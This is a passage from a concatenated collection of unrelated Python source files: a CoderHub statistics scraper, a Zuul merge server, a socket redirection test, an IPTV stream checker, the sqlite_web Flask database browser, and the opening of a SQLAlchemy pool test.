thread.join()
for index, user in enumerate(users_lst):
easy_challenges_counter = 0
med_challenges_counter = 0
hard_challenges_counter = 0
user_data = self.users_data[str(user)]
if user_data != "private":
total_solved_challenges_all_languages.append(user_data['total_solved_challenges'])
for user_language in user_data['programming_languages']:
if user_language['name'] == "سهل":
easy_challenges_counter = easy_challenges_counter + user_language['solved_challenges']
elif user_language['name'] == "متوسط":
med_challenges_counter = med_challenges_counter + user_language['solved_challenges']
else:
hard_challenges_counter = hard_challenges_counter + user_language['solved_challenges']
total_easy_solved.append(easy_challenges_counter)
total_med_solved.append(med_challenges_counter)
total_hard_solved.append(hard_challenges_counter)
points = (easy_challenges_counter*5) + (med_challenges_counter*10) + (hard_challenges_counter*20)
total_points.append(points)
for user_languages in user_data['total_solved_per_programming_language']:
if user_languages['programming_language_name'].lower() == languages_lst[index].lower():
total_solved_challenges.append(user_languages['total_solved'])
break
else:
continue
else:
# this exception will happen if user is private
total_easy_solved.append("private")
total_med_solved.append("private")
total_hard_solved.append("private")
total_points.append("private")
total_solved_challenges.append("private")
total_solved_challenges_all_languages.append("private")
continue
end_timer = time.perf_counter()
leaderboard_datatable.insert(4, "total_challenges_solved", total_solved_challenges)
leaderboard_datatable.insert(5, "total_challenges_solved_all_languages", total_solved_challenges_all_languages)
leaderboard_datatable.insert(6, "total_easy_solved", total_easy_solved)
leaderboard_datatable.insert(7, "total_medium_solved", total_med_solved)
leaderboard_datatable.insert(8, "total_hard_solved", total_hard_solved)
leaderboard_datatable.insert(9, "total_points_all_challenges", total_points)
print(f"total time : {end_timer - start_timer} seconds")
return leaderboard_datatable
def get_user_total_points(self, username:str):
user_id = self.get_user_id(username)
total_points = requests.get(f"https://api.coderhub.sa/api/profile/get-user-points/{user_id}").json()
return total_points
def get_user_stats(self, username: str):
user_data = self.get_user_statistics(username=username)
total_solved_all_lang = user_data['total_solved_challenges']
total_points_data = self.get_user_total_points(username)
total_points = []
user_lang = []
total_solved_per_programming_language = []
user_lang_data = []
easy_solved = []
medium_solved = []
hard_solved = []
total_solved = []
for data in user_data['total_solved_per_programming_language']:
user_lang.append(data['programming_language_name'])
total_solved_per_programming_language.append(data['total_solved'])
for lang in user_lang:
for points in total_points_data:
if points['langauge_name'] == str(lang):
lang_points = points["points"]
total_points.append(lang_points)
print(total_points)
solved_per_language = {}
for language in user_lang:
solved_per_language[str(language)] = []
for language in user_lang:
current_lang_easy_solved = 0
current_lang_med_solved = 0
current_lang_hard_solved = 0
for data in user_data['programming_languages']:
if data['programming_language_name'] == language:
if data['name'] == "سهل":
current_lang_easy_solved += data['solved_challenges']
elif data['name'] == "متوسط":
current_lang_med_solved += data['solved_challenges']
elif data['name'] == "صعب":
current_lang_hard_solved += data['solved_challenges']
user_lang_data.append({f"{language}": [current_lang_easy_solved,
current_lang_med_solved,
current_lang_hard_solved]})
for lang_data, lang in zip(user_lang_data, user_lang):
lang_data[str(lang)].append(sum(lang_data[str(lang)]))
lang_data[str(lang)].append(
(lang_data[str(lang)][0] * 5) +
(lang_data[str(lang)][1] * 10) +
(lang_data[str(lang)][2] * 20)
)
for lang, lang_data in zip(user_lang, user_lang_data):
easy_solved.append(lang_data[str(lang)][0])
medium_solved.append(lang_data[str(lang)][1])
hard_solved.append(lang_data[str(lang)][2])
total_solved.append(lang_data[str(lang)][3])
df = pd.DataFrame()
df.insert(0, 'language', user_lang)
df.insert(0, 'easy_solved', easy_solved)
df.insert(0, 'medium_solved', medium_solved)
df.insert(0, 'hard_solved', hard_solved)
df.insert(0, 'total_solved', total_solved)
df.insert(0, 'total_points', total_points)
return df
cs = CoderHubStats()
print(cs.get_user_stats("nafiealhelaly"))
|
server.py
|
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
import threading
import traceback
import gear
from zuul.merger import merger
class MergeServer(object):
log = logging.getLogger("zuul.MergeServer")
def __init__(self, config, connections={}):
self.config = config
self.zuul_url = config.get('merger', 'zuul_url')
if self.config.has_option('merger', 'git_dir'):
merge_root = self.config.get('merger', 'git_dir')
else:
merge_root = '/var/lib/zuul/git'
if self.config.has_option('merger', 'git_user_email'):
merge_email = self.config.get('merger', 'git_user_email')
else:
merge_email = None
if self.config.has_option('merger', 'git_user_name'):
merge_name = self.config.get('merger', 'git_user_name')
else:
merge_name = None
self.merger = merger.Merger(merge_root, connections, merge_email,
merge_name)
def start(self):
self._running = True
server = self.config.get('gearman', 'server')
if self.config.has_option('gearman', 'port'):
port = self.config.get('gearman', 'port')
else:
port = 4730
self.worker = gear.Worker('Zuul Merger')
self.worker.addServer(server, port)
self.log.debug("Waiting for server")
self.worker.waitForServer()
self.log.debug("Registering")
self.register()
self.log.debug("Starting worker")
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
def register(self):
self.worker.registerFunction("merger:merge")
self.worker.registerFunction("merger:update")
def stop(self):
self.log.debug("Stopping")
self._running = False
self.worker.shutdown()
self.log.debug("Stopped")
def join(self):
self.thread.join()
def run(self):
self.log.debug("Starting merge listener")
while self._running:
try:
job = self.worker.getJob()
try:
if job.name == 'merger:merge':
self.log.debug("Got merge job: %s" % job.unique)
self.merge(job)
elif job.name == 'merger:update':
self.log.debug("Got update job: %s" % job.unique)
self.update(job)
else:
self.log.error("Unable to handle job %s" % job.name)
job.sendWorkFail()
except Exception:
self.log.exception("Exception while running job")
job.sendWorkException(traceback.format_exc())
except Exception:
self.log.exception("Exception while getting job")
def merge(self, job):
args = json.loads(job.arguments)
commit = self.merger.mergeChanges(args['items'])
result = dict(merged=(commit is not None),
commit=commit,
zuul_url=self.zuul_url)
job.sendWorkComplete(json.dumps(result))
def update(self, job):
args = json.loads(job.arguments)
self.merger.updateRepo(args['project'],
args['connection_name'],
args['url'])
result = dict(updated=True,
zuul_url=self.zuul_url)
job.sendWorkComplete(json.dumps(result))
|
test-socket_stream_redirect.py
|
"""
###############################################################################
test the socket_stream_redirection.py modes
###############################################################################
"""
import sys, os, multiprocessing
from socket_stream_redirect import *
###############################################################################
# redirected client output
###############################################################################
def server1():
mypid = os.getpid()
conn = initListenerSocket() # block till client connect
file = conn.makefile('r')
for i in range(3): # read/recv client's prints
data = file.readline().rstrip() # block till data ready
print('server %s got [%s]' % (mypid, data)) # print normally to terminal
def client1():
mypid = os.getpid()
redirectOut()
for i in range(3):
print('client %s: %s' % (mypid, i)) # print to socket
sys.stdout.flush() # else buffered till exits!
###############################################################################
# redirected client input
###############################################################################
def server2():
mypid = os.getpid() # raw socket not buffered
conn = initListenerSocket() # send to client's input
for i in range(3):
conn.send(('server %s: %s\n' % (mypid, i)).encode())
def client2():
mypid = os.getpid()
redirectIn()
for i in range(3):
data = input() # input from socket
print('client %s got [%s]' % (mypid, data)) # print normally to terminal
###############################################################################
# redirect client input + output, client is socket client
###############################################################################
def server3():
mypid = os.getpid()
conn = initListenerSocket() # wait for client connect
file = conn.makefile('r') # recv print(), send input()
for i in range(3): # readline blocks till data
data = file.readline().rstrip()
conn.send(('server %s got [%s]\n' % (mypid, data)).encode())
def client3():
mypid = os.getpid()
redirectBothAsClient()
for i in range(3):
print('client %s: %s' % (mypid, i)) # print to socket
data = input() # input from socket: flushes!
sys.stderr.write('client %s got [%s]\n' % (mypid, data)) # not redirected
###############################################################################
# redirect client input + output, client is socket server
###############################################################################
def server4():
mypid = os.getpid()
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, port))
file = sock.makefile('r')
for i in range(3):
sock.send(('server %s: %s\n' % (mypid, i)).encode()) # send to input()
data = file.readline().rstrip() # recv from print()
print('server %s got [%s]' % (mypid, data)) # result to terminal
def client4():
mypid = os.getpid()
redirectBothAsServer() # I'm actually the socket server in this mode
for i in range(3):
data = input() # input from socket: flushes!
print('client %s got [%s]' % (mypid, data)) # print to socket
sys.stdout.flush() # else last buffered till exit!
###############################################################################
# redirect client input + output, client is socket client, server xfers first
###############################################################################
def server5():
mypid = os.getpid() # test 4, but server accepts
conn = initListenerSocket() # wait for client connect
file = conn.makefile('r') # send input(), recv print()
for i in range(3):
conn.send(('server %s: %s\n' % (mypid, i)).encode())
data = file.readline().rstrip()
print('server %s got [%s]' % (mypid, data))
def client5():
mypid = os.getpid()
s = redirectBothAsClient() # I'm the socket client in this mode
for i in range(3):
data = input() # input from socket: flushes!
print('client %s got [%s]' % (mypid, data)) # print to socket
sys.stdout.flush() # else last buffered toll exit!
###############################################################################
# test by number on command-line
###############################################################################
if __name__ == '__main__':
server = eval('server' + sys.argv[1])
client = eval('client' + sys.argv[1]) # client in this process
multiprocessing.Process(target=server).start() # server in new process
client() # reset streams in client
#import time; time.sleep(5) # test effect of exit flush
|
base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tools
import time
import re
import db
import threading
class Source (object) :
def __init__ (self):
self.T = tools.Tools()
self.now = int(time.time() * 1000)
def getSource (self) :
urlList = []
url = 'https://www.jianshu.com/p/2499255c7e79'
req = [
'user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Mobile Safari/537.36',
]
res = self.T.getPage(url, req)
if res['code'] == 200 :
pattern = re.compile(r"<code(.*?)</code>", re.I|re.S)
tmp = pattern.findall(res['body'])
pattern = re.compile(r"#EXTINF:0,(.*?)\n#EXTVLCOPT:network-caching=1000\n(.*?)\n", re.I|re.S)
sourceList = pattern.findall(tmp[0])
sourceList = sourceList + pattern.findall(tmp[1])
threads = []
for item in sourceList :
thread = threading.Thread(target = self.detectData, args = (item[0], item[1], ), daemon = True)
thread.start()
threads.append(thread)
for t in threads:
t.join()
else :
pass # MAYBE later :P
return urlList
def detectData (self, title, url) :
info = self.T.fmtTitle(title)
netstat = self.T.chkPlayable(url)
if netstat > 0 :
cros = 1 if self.T.chkCros(url) else 0
data = {
'title' : str(info['id']) if info['id'] != '' else str(info['title']),
'url' : str(url),
'quality': str(info['quality']),
'delay' : netstat,
'level' : str(info['level']),
'cros' : cros,
'online' : 1,
'udTime' : self.now,
}
self.addData(data)
print('Checking[ %s ]: %s' % (str(info['id']) + str(info['title']), url))
else :
pass # MAYBE later :P
def addData (self, data) :
DB = db.DataBase()
sql = "SELECT * FROM %s WHERE url = '%s'" % (DB.table, data['url'])
result = DB.query(sql)
if len(result) == 0 :
data['enable'] = 1
DB.insert(data)
else :
id = result[0][0]
DB.edit(id, data)
|
sqlite_web.py
|
#!/usr/bin/env python
import datetime
import math
import operator
import optparse
import os
import re
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
from io import TextIOWrapper
# Py2k compat.
if sys.version_info[0] == 2:
PY2 = True
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
else:
PY2 = False
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --update '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
migrator = None
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
def get_saved_queries(self):
cursor = self.query(
'SELECT name, query, id FROM jimber_queries'
)
return set([row for row in cursor.fetchall()])
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
if request.form.get('password') == app.config['PASSWORD']:
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
flash('The password you entered is incorrect.', 'danger')
return render_template('login.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
@app.route('/create-table/', methods=['POST'])
def table_create():
table = (request.form.get('table_name') or '').strip()
if not table:
flash('Table name is required.', 'danger')
return redirect(request.form.get('redirect') or url_for('index'))
dataset[table]
return redirect(url_for('table_import', table=table))
@app.route('/<table>/')
@require_table
def table_structure(table):
ds_table = dataset[table]
model_class = ds_table.model_class
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_structure.html',
columns=dataset.get_columns(table),
ds_table=ds_table,
foreign_keys=dataset.get_foreign_keys(table),
indexes=dataset.get_indexes(table),
model_class=model_class,
table=table,
table_sql=table_sql,
triggers=dataset.get_triggers(table))
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/<table>/add-column/', methods=['GET', 'POST'])
@require_table
def add_column(table):
column_mapping = OrderedDict((
('VARCHAR', CharField),
('TEXT', TextField),
('INTEGER', IntegerField),
('REAL', FloatField),
('BOOL', BooleanField),
('BLOB', BlobField),
('DATETIME', DateTimeField),
('DATE', DateField),
('TIME', TimeField),
('DECIMAL', DecimalField)))
request_data = get_request_data()
col_type = request_data.get('type')
name = request_data.get('name', '')
if request.method == 'POST':
if name and col_type in column_mapping:
migrate(
migrator.add_column(
table,
name,
column_mapping[col_type](null=True)))
flash('Column "%s" was added successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name and column type are required.', 'danger')
return render_template(
'add_column.html',
col_type=col_type,
column_mapping=column_mapping,
name=name,
table=table)
@app.route('/<table>/drop-column/', methods=['GET', 'POST'])
@require_table
def drop_column(table):
request_data = get_request_data()
name = request_data.get('name', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if name in column_names:
migrate(migrator.drop_column(table, name))
flash('Column "%s" was dropped successfully!' % name, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Name is required.', 'danger')
return render_template(
'drop_column.html',
columns=columns,
column_names=column_names,
name=name,
table=table)
@app.route('/<table>/rename-column/', methods=['GET', 'POST'])
@require_table
def rename_column(table):
request_data = get_request_data()
rename = request_data.get('rename', '')
rename_to = request_data.get('rename_to', '')
columns = dataset.get_columns(table)
column_names = [column.name for column in columns]
if request.method == 'POST':
if (rename in column_names) and (rename_to not in column_names):
migrate(migrator.rename_column(table, rename, rename_to))
flash('Column "%s" was renamed successfully!' % rename, 'success')
dataset.update_cache(table)
return redirect(url_for('table_structure', table=table))
else:
flash('Column name is required and cannot conflict with an '
'existing column\'s name.', 'danger')
return render_template(
'rename_column.html',
columns=columns,
column_names=column_names,
rename=rename,
rename_to=rename_to,
table=table)
@app.route('/<table>/add-index/', methods=['GET', 'POST'])
@require_table
def add_index(table):
request_data = get_request_data()
indexed_columns = request_data.getlist('indexed_columns')
unique = bool(request_data.get('unique'))
columns = dataset.get_columns(table)
if request.method == 'POST':
if indexed_columns:
migrate(
migrator.add_index(
table,
indexed_columns,
unique))
flash('Index created successfully.', 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
table=table,
total_pages=total_pages,
total_rows=total_rows)
@app.route('/deletequery/', methods=['GET', 'POST'])
def deletequery():
if request.args.get('id'):
id = request.args.get('id')
query = "DELETE FROM jimber_queries WHERE id=?"
dataset.query(query, [id])
return render_template('index.html', sqlite=sqlite3)
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
displayquery = True
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
elif 'save' in request.form:
name = request.form['name']
save_query = """INSERT INTO jimber_queries(name, query)
VALUES ( ?, ?)"""
dataset.query(save_query, [name, sql])
return render_template(
'query_saved.html'
)
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
displayquery = False
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql,
displayquery=displayquery)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
# Here we need to translate the file stream. Werkzeug uses a
# spooled temporary file opened in wb+ mode, which is not
# compatible with Python's CSV module. We'd need to reach pretty
# far into Flask's internals to modify this behavior, so instead
# we'll just translate the stream into utf8-decoded unicode.
if not PY2:
try:
stream = TextIOWrapper(file_obj, encoding='utf8')
except AttributeError:
# The SpooledTemporaryFile used by werkzeug does not
# implement an API that the TextIOWrapper expects, so we'll
# just consume the whole damn thing and decode it.
# Fixed in werkzeug 0.15.
stream = StringIO(file_obj.read().decode('utf8'))
else:
stream = file_obj.stream
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
dataset.update_cache() # Update all tables.
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile('(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
start_response('404', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
parser.add_option(
'-r',
'--read-only',
action='store_true',
dest='read_only',
help='Open database in read-only mode.')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL prefix for application.')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
def initialize_app(filename, read_only=False, password=None, url_prefix=None):
global dataset
global migrator
if password:
install_auth_handler(password)
if read_only:
if sys.version_info < (3, 4, 0):
die('Python 3.4.0 or newer is required for read-only access.')
if peewee_version < (3, 5, 1):
die('Peewee 3.5.1 or newer is required for read-only access.')
db = SqliteDatabase('file:%s?mode=ro' % filename, uri=True)
try:
db.connect()
except OperationalError:
die('Unable to open database file in read-only mode. Ensure that '
'the database exists in order to use read-only mode.')
db.close()
dataset = SqliteDataSet(db, bare_fields=True)
else:
dataset = SqliteDataSet('sqlite:///%s' % filename, bare_fields=True)
if url_prefix:
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix)
migrator = dataset._migrator
dataset.close()
def main():
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
if os.environ.get('SQLITE_WEB_PASSWORD'):
password = os.environ['SQLITE_WEB_PASSWORD']
else:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
# Initialize the dataset instance and (optionally) authentication handler.
initialize_app(args[0], options.read_only, password, options.url_prefix)
if options.browser:
open_browser_tab(options.host, options.port)
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
